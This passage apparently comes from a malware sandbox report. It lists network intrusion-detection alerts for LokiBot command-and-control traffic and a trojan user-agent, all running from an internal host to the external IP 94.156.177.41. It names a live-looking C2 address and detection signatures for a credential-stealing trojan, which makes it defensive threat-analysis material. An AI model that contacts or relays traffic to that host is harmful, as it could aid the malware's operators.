2025-01-07T12:32:45.260532+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:46.120173+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:47.026386+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:47.914990+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:48.821374+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:49.713193+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:50.609302+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:51.495138+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:52.422354+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:53.323679+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:54.426552+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:55.294818+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:56.184948+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:57.071831+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:57.962291+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:58.853828+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:59.720354+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:33:00.607397+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:33:01.490314+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:02.396007+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:03.285971+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:04.228379+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:05.135088+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:06.011427+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:06.894211+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:07.922188+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:08.808854+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:09.719346+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:10.771269+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:11.659311+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:12.593371+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:13.817700+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:14.698696+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:15.583031+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:16.529723+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:17.415506+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:18.317821+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:19.383367+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:20.262019+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:21.160919+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:22.097407+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:22.988429+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:23.905645+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:24.785850+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:25.726265+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:26.611215+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:27.495067+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:28.406726+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:29.321667+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:30.200229+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:31.133820+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:32.021373+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:32.920405+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:33.838131+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:34.750375+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:35.663277+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:36.542571+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:37.462301+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:38.351026+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:39.277673+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:40.149202+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:41.026481+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:42.069136+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:42.943866+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:43.909799+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:44.821678+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:45.694009+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:46.585711+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:47.641378+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:48.495517+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:49.400961+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:50.308279+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:51.192040+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:52.077623+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:53.256311+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:54.360403+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:55.263205+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:56.154405+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:57.175145+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:58.088991+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:58.979379+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:59.832529+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:34:00.722379+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:34:01.830408+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50139	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:32:03.275190+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:04.338995+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:05.248744+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:07.009365+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:07.935086+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:08.818254+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:09.731700+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:10.797050+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:11.917927+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:12.853819+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:13.756413+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:14.647155+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:15.593522+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:16.533683+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:17.445085+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:18.365851+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:19.255213+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:20.161554+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:21.055285+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:21.994686+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:22.907710+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:23.819944+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:24.698249+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:25.606968+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:26.577641+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:27.430547+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:28.316402+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:29.349357+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:30.221935+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:31.091089+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:31.988683+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:32.891493+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:33.772124+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:34.665544+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:35.557501+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:36.434903+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:37.324672+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:38.192729+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:39.104383+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:39.957327+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:40.840674+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:41.705575+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:42.591000+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:43.480919+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:44.368376+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:45.260532+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:46.120173+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:47.026386+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:47.914990+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:48.821374+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:49.713193+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:50.609302+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:51.495138+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:52.422354+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:53.323679+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:54.426552+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:55.294818+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:56.184948+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:57.071831+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:57.962291+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:58.853828+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:59.720354+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:33:00.607397+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:33:01.490314+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:02.396007+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:03.285971+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:04.228379+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:05.135088+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:06.011427+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:06.894211+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:07.922188+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:08.808854+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:09.719346+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:10.771269+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:11.659311+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:12.593371+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:13.817700+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:14.698696+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:15.583031+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:16.529723+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:17.415506+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:18.317821+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:19.383367+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:20.262019+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:21.160919+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:22.097407+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:22.988429+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:23.905645+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:24.785850+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:25.726265+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:26.611215+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:27.495067+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:28.406726+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:29.321667+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:30.200229+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:31.133820+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:32.021373+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:32.920405+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:33.838131+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:34.750375+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:35.663277+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:36.542571+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:37.462301+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:38.351026+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:39.277673+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:40.149202+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:41.026481+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:42.069136+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:42.943866+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:43.909799+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:44.821678+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:45.694009+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:46.585711+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:47.641378+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:48.495517+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:49.400961+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:50.308279+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:51.192040+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:52.077623+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:53.256311+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:54.360403+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:55.263205+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:56.154405+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:57.175145+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:58.088991+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:58.979379+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:59.832529+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:34:00.722379+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:34:01.830408+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50139	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:32:00.796955+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49735	94.156.177.41	80	TCP
2025-01-07T12:32:01.754699+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49737	94.156.177.41	80	TCP
2025-01-07T12:32:02.549908+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:03.602114+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:04.490438+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:05.412187+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:07.187246+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:08.083804+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:08.974835+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:10.073415+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:11.223373+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:12.117368+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:13.004316+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:13.932697+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:14.805465+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:15.769592+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49758	94.156.177.41	80	TCP
